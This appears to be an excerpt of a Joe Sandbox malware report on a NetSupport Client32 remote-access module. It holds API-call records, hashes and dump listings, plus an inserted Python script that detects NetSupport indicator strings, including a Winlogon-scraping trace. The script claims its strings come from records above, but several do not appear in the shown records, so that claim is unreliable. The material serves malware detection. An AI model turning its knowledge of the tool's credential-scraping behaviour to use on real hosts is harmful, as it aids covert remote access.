• Opcode ID: f2da70192ea748e9f34c0dc608bbfc5127eac0f66cddfa81a88e06c54501c5c1
• Instruction ID: ccefda0306997504386ffa10b0ea1e2f2bf74c184b008c30e10531185750030f
• Opcode Fuzzy Hash: f2da70192ea748e9f34c0dc608bbfc5127eac0f66cddfa81a88e06c54501c5c1
• Instruction Fuzzy Hash: F3213474F10B016BE712DAA098C5BAEB6D9ABC030CF104079FA8A5A2C0DBB17554C396
APIs
• _strtok.LIBCMT ref: 11037362
  • Part of subcall function 11158876: __getptd.LIBCMT ref: 11158894
• _strtok.LIBCMT ref: 110373E3
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
• String ID: ; >$CLTCONN.CPP
• API String ID: 3120919156-788487980
• Opcode ID: f14fa2139646d157dbe39acfd2d662c28a25447d49972a8ea342c89154dcd672
• Instruction ID: db128bff47b3abe3fe11246236d2ade99bf76238e225518ade0ef558f75a81db
• Opcode Fuzzy Hash: f14fa2139646d157dbe39acfd2d662c28a25447d49972a8ea342c89154dcd672
• Instruction Fuzzy Hash: 45212475F00A476BE701DAA69C41B8EBBD89B84265F0440A9FE58AB341FA74ED0083E1
APIs
  • Part of subcall function 110E5A00: IsWindow.USER32(0000070B), ref: 110E5A0D
  • Part of subcall function 110E5A00: SendMessageA.USER32(0000070B,0000045F,0000070B,00000000), ref: 110E5A44
  • Part of subcall function 110E5A00: SendMessageA.USER32(0000070B,0000044B,00000000,?), ref: 110E5A76
• LoadCursorA.USER32(00000000,00007F00), ref: 1104776E
• SetCursor.USER32(00000000), ref: 11047775
  • Part of subcall function 1113AEB0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11189A50), ref: 1113AF1D
  • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110784B), ref: 1113AF5E
  • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113AFBB
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CursorFolderMessagePathSend$FileLoadModuleNameWindow
• String ID: "%s%s" %s$nsmexec.exe
• API String ID: 3894576003-3170401571
• Opcode ID: fc034951f652329fed552b4d995688a30b4f0b45664675c741e07d543320d767
• Instruction ID: 474df1859d4285f55e9963371b130ebdf3c3feee0e9b6e8767a7b1d967c1572f
• Opcode Fuzzy Hash: fc034951f652329fed552b4d995688a30b4f0b45664675c741e07d543320d767
• Instruction Fuzzy Hash: 1821DE72D04605ABD700CFA1CC84F9AF7A8EB01629F508179E81897680E779B6008BE2
APIs
• GetDC.USER32(00000000), ref: 11005881
• ReleaseDC.USER32(00000000,00000000), ref: 110058BC
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcessReleasewsprintf
• String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
• API String ID: 3704029381-1557312927
• Opcode ID: 006548d092e605309b07901970ac0f0a1f42638b8aed2354c93f73f7cf0c922c
• Instruction ID: c8f121e53884fb9c95b9b706ef97250132daf4395f03128dde5ad018dc1f258f
• Opcode Fuzzy Hash: 006548d092e605309b07901970ac0f0a1f42638b8aed2354c93f73f7cf0c922c
• Instruction Fuzzy Hash: 28210335A00705AFF711CE25DC80FDBB3E9AF86358F00846DE9A98B280DB32B504CB52
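The function records above (GetRemoteIPAddress, uuencode.c, ScrapeWinlogon, CLTCONN.CPP, nsmexec.exe, wndclass.h) share a set of strings that survive in the 0x11000000 in-memory module and are the quickest way to confirm a NetSupport client component in a dump pulled from another host. The script below is an added example, not Joe Sandbox or NetSupport code: it takes the indicator strings exactly as they appear in this report's String ID entries, scans a dump for them in both ASCII and UTF-16LE, and applies a simple corroboration rule before calling the dump a NetSupport client. The dump bytes at the bottom are constructed here so the script runs offline; the minimum-indicator threshold and the labels are assumptions, not part of the report.

```python
"""Scan a memory dump for NetSupport client32 indicator strings.

Added example, not Joe Sandbox or NetSupport code. INDICATORS are copied
from the String ID entries of the function records in this report; the
labels and the corroboration threshold are this example's own assumptions.
"""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass

# Strings taken from the report's per-function "String ID" fields.
INDICATORS = {
    b"GetRemoteIPAddress() the socket is not connected": "socket helper trace",
    b"ScrapeWinlogon(": "winlogon scraping trace",
    b"nsmexec.exe": "NetSupport exec component name",
    b"..\\CTL32\\uuencode.c": "CTL32 source path",
    b"e:\\nsmsrc\\nsm\\": "NetSupport build tree path",
    b"CLTCONN.CPP": "client connection source file",
    b"Client32": "MessageBoxA caption (weak on its own)",
}

# Assumption: one string such as "Client32" is too generic to decide on; require
# at least this many distinct indicators before reporting a NetSupport client.
MIN_DISTINCT_INDICATORS = 2


@dataclass(frozen=True)
class Hit:
    offset: int
    encoding: str      # "ascii" or "utf16le"
    indicator: str
    label: str


def scan(buf: bytes) -> list[Hit]:
    """Return every ASCII and UTF-16LE occurrence of an indicator, sorted by offset."""
    hits: list[Hit] = []
    for needle, label in INDICATORS.items():
        text = needle.decode("ascii")
        for enc, pattern in (("ascii", needle), ("utf16le", text.encode("utf-16-le"))):
            for m in re.finditer(re.escape(pattern), buf):
                hits.append(Hit(m.start(), enc, text, label))
    return sorted(hits, key=lambda h: (h.offset, h.encoding))


def distinct_indicators(hits: list[Hit]) -> set[str]:
    return {h.indicator for h in hits}


def is_netsupport_client(hits: list[Hit]) -> bool:
    """Corroboration rule: enough distinct strings, not just the generic caption."""
    return len(distinct_indicators(hits)) >= MIN_DISTINCT_INDICATORS


# Constructed dump fragment (not from the report): filler bytes around one ASCII
# trace string, one UTF-16LE component name and one build-tree path.
CONSTRUCTED_DUMP = (
    b"\x00" * 16
    + b"ScrapeWinlogon(true), mode=%x, flags=%x\x00"
    + b"\xcc" * 8
    + "nsmexec.exe".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 4
    + b"e:\\nsmsrc\\nsm\\1201\\1201f2\\ctl32\\wndclass.h\x00"
)


def main(argv: list[str]) -> int:
    # Usage: python scan_nsm.py [dump.sdmp]; without an argument the constructed
    # fragment above is scanned so the script demonstrates itself offline.
    data = open(argv[1], "rb").read() if len(argv) > 1 else CONSTRUCTED_DUMP
    hits = scan(data)
    for h in hits:
        print(f"0x{h.offset:08x} {h.encoding:8} {h.indicator!r:55} {h.label}")
    verdict = "NetSupport client strings corroborated" if is_netsupport_client(hits) \
        else "insufficient corroboration"
    print(f"{len(hits)} hit(s), {len(distinct_indicators(hits))} distinct: {verdict}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

A match on these strings identifies the NetSupport client code in the dump; whether that is malicious depends on context the report records elsewhere, such as the sample arriving as Merge.exe and the module being dropped and loaded from a non-standard location. The UTF-16LE pass matters because the same component names appear as wide strings in Windows path and command-line handling, and an ASCII-only scan would miss them.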
APIs
• GetWindowLongA.USER32(00000000,000000F0), ref: 110A559B
• SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 110A55E8
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
                                                                                                    • API ID: LongWindow$ErrorExitLastMessageProcesswsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 2260967848-1557312927
                                                                                                    • Opcode ID: 19e3c1fe8c0f1b58243402a7cc324c8fbe65e83d634eb8f9150276d8f739c585
                                                                                                    • Instruction ID: 977d14c15c8ea9969de917a7632c4011be37bdaf01ac392639db5d23ee24297a
                                                                                                    • Opcode Fuzzy Hash: 19e3c1fe8c0f1b58243402a7cc324c8fbe65e83d634eb8f9150276d8f739c585
                                                                                                    • Instruction Fuzzy Hash: 8201F472D0463ABAD310CAA6EC98F45F759BB40378F118335F928A65C0EB72A951CBD1
                                                                                                    APIs
                                                                                                      • Part of subcall function 11091420: LoadLibraryA.KERNEL32(USER32,?,?,1111146C), ref: 11091429
                                                                                                      • Part of subcall function 11091420: GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1109143D
                                                                                                      • Part of subcall function 11091420: GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1109144A
                                                                                                      • Part of subcall function 11091420: GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 11091457
                                                                                                      • Part of subcall function 11091420: GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 11091464
                                                                                                      • Part of subcall function 11091420: _memset.LIBCMT ref: 11091474
                                                                                                    • LoadLibraryA.KERNEL32(dwmapi.dll,218EC38C,?,?,00000000,00000000,Function_001725C8,000000FF,?,110F0770,?), ref: 1112F4F7
                                                                                                    • GlobalAddAtomA.KERNEL32(NSMBlankWnd), ref: 1112F520
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$AtomGlobal_memset
                                                                                                    • String ID: NSMBlankWnd$dwmapi.dll
                                                                                                    • API String ID: 1486806061-3254748277
                                                                                                    • Opcode ID: e5e71ec4e7030411be38a273ea76bc549a8f1fba87bc9a173fb9f5573e74137a
                                                                                                    • Instruction ID: 3806c2d577549acdd3d357e76783547b80994e82cc6b2600800a28ee96a99825
                                                                                                    • Opcode Fuzzy Hash: e5e71ec4e7030411be38a273ea76bc549a8f1fba87bc9a173fb9f5573e74137a
                                                                                                    • Instruction Fuzzy Hash: AA011BB5A05A549FD321CF69D840BDAFBE8FB5A720F00462FE86AD3700DB706501CB51
                                                                                                    APIs
                                                                                                    • InterlockedIncrement.KERNEL32(10715B58), ref: 10702B97
                                                                                                    • wsprintfA.USER32 ref: 10702BC6
                                                                                                    • CreateEventA.KERNEL32(?,?,?,?), ref: 10702BE4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateEventIncrementInterlockedwsprintf
                                                                                                    • String ID: %s_L%d_%x
                                                                                                    • API String ID: 608154824-3441399356
                                                                                                    • Opcode ID: e11d0b65dd49d94373b60c2733f6c9292192ee08cafd4bdc4cfde9b2804ef49b
                                                                                                    • Instruction ID: 412f0433949f51ee11ace6e16096771bb88ef87fd4ce0d7511e0046e7a8ce87e
                                                                                                    • Opcode Fuzzy Hash: e11d0b65dd49d94373b60c2733f6c9292192ee08cafd4bdc4cfde9b2804ef49b
                                                                                                    • Instruction Fuzzy Hash: 43F03CB6600118ABDB10DF68DC89EEB77BCEB89341F004155FE08D3280E675E955CBA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 1103D820: IsWindow.USER32(00000000), ref: 1103D836
                                                                                                      • Part of subcall function 1103D820: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D84C
                                                                                                      • Part of subcall function 1103D820: IsWindow.USER32(00000000), ref: 1103D854
                                                                                                      • Part of subcall function 1103D820: Sleep.KERNEL32(00000014), ref: 1103D867
                                                                                                      • Part of subcall function 1103D820: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D877
                                                                                                      • Part of subcall function 1103D820: IsWindow.USER32(00000000), ref: 1103D87F
                                                                                                    • IsWindow.USER32(00000000), ref: 1103D8BA
                                                                                                    • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103D8CD
                                                                                                    Strings
                                                                                                    • PCIVideoSlave32, xrefs: 1103D8D8
                                                                                                    • DoMMData - could not find %s window, xrefs: 1103D8DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Find$MessageSendSleep
                                                                                                    • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                                                                    • API String ID: 1010850397-3146847729
                                                                                                    • Opcode ID: 59d1aa3e7580583fe14735909c83a67f39afb1ebbd8289926530bb3557182d85
                                                                                                    • Instruction ID: 794ad1d0e3b69f8aaa6c071038eb11c64f103741b10cc09acd9ab3006e1afefb
                                                                                                    • Opcode Fuzzy Hash: 59d1aa3e7580583fe14735909c83a67f39afb1ebbd8289926530bb3557182d85
                                                                                                    • Instruction Fuzzy Hash: D2F02771E5021877E710AB54AC0ABDDB7A8DF0131AF004099FC08662C0E7B1261047D6
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,LsaNtStatusToWinError,?,110A7D0E,00000000,218EC38C,00000000,?,00000000), ref: 110A766D
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 110A7674
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: Advapi32.dll$LsaNtStatusToWinError
                                                                                                    • API String ID: 1646373207-2970311197
                                                                                                    • Opcode ID: ae664d36eae72a938c56288cceb2c80793f5d08de1e41e2230961d7ef98cbca0
                                                                                                    • Instruction ID: 2accae55ca2b5792729f0a1934953a71f409c38dbf1f797fdf7c587213e78e09
                                                                                                    • Opcode Fuzzy Hash: ae664d36eae72a938c56288cceb2c80793f5d08de1e41e2230961d7ef98cbca0
                                                                                                    • Instruction Fuzzy Hash: 8BD0A77235410C6BDF04DFF9FC84E5D7B9CAB84285B008024F81EC3040D932D100C7A1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bb13045082f433e4fbec704f34339cdd38acbf10bd18cac104a89994f8584751
                                                                                                    • Instruction ID: fc1c1e27e9268ba457460c1e0a47d9a36352585bb26c5b3cb28cc44438fa96f6
                                                                                                    • Opcode Fuzzy Hash: bb13045082f433e4fbec704f34339cdd38acbf10bd18cac104a89994f8584751
                                                                                                    • Instruction Fuzzy Hash: E7911575D00259EFCB119B68DC84ACEBBF8EB4A7A0F214316F854F6598E7319D40CBA4
                                                                                                    APIs
                                                                                                    • HeapAlloc.KERNEL32(00000000,00002020,107127F0,107127F0,?,?,10707573,00000000,00000010,00000000,00000009,00000009,?,1070479C,00000010,00000000), ref: 107070C8
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,10707573,00000000,00000010,00000000,00000009,00000009,?,1070479C,00000010,00000000), ref: 107070EC
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,10707573,00000000,00000010,00000000,00000009,00000009,?,1070479C,00000010,00000000), ref: 10707106
                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,10707573,00000000,00000010,00000000,00000009,00000009,?,1070479C,00000010,00000000,?), ref: 107071C7
                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,10707573,00000000,00000010,00000000,00000009,00000009,?,1070479C,00000010,00000000,?,00000000), ref: 107071DE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual$FreeHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 714016831-0
                                                                                                    • Opcode ID: 86ac732e2cef7a4f41e4384cd78238bc16a240184a4ca22a51a8563f44cb6df4
                                                                                                    • Instruction ID: feb03214d5741fced040bc47ab8b5ae6cf5826734a76310682f2babfde8836ec
                                                                                                    • Opcode Fuzzy Hash: 86ac732e2cef7a4f41e4384cd78238bc16a240184a4ca22a51a8563f44cb6df4
                                                                                                    • Instruction Fuzzy Hash: 813127B1A407169FD3218F24CC84F12B7E0FB8A794F118329F265973D4E7B0A855DB98
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(10718A40,0000000D,10722A80,00000000,?,10703647,00000000,00000000,00000000,00000000,?,107043D4,00008084,?,00000000,00000000), ref: 107035C8
                                                                                                    • LeaveCriticalSection.KERNEL32(10718A40,?,10703647,00000000,00000000,00000000,00000000,?,107043D4,00008084,?,00000000,00000000,00000000), ref: 107035DF
                                                                                                    • Sleep.KERNEL32(0000000A,?,10703647,00000000,00000000,00000000,00000000,?,107043D4,00008084,?,00000000,00000000,00000000), ref: 107035EB
                                                                                                    • EnterCriticalSection.KERNEL32(10718A40,?,10703647,00000000,00000000,00000000,00000000,?,107043D4,00008084,?,00000000,00000000,00000000), ref: 107035F6
                                                                                                    • LeaveCriticalSection.KERNEL32(10718A40,?,10703647,00000000,00000000,00000000,00000000,?,107043D4,00008084,?,00000000,00000000,00000000), ref: 1070360D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
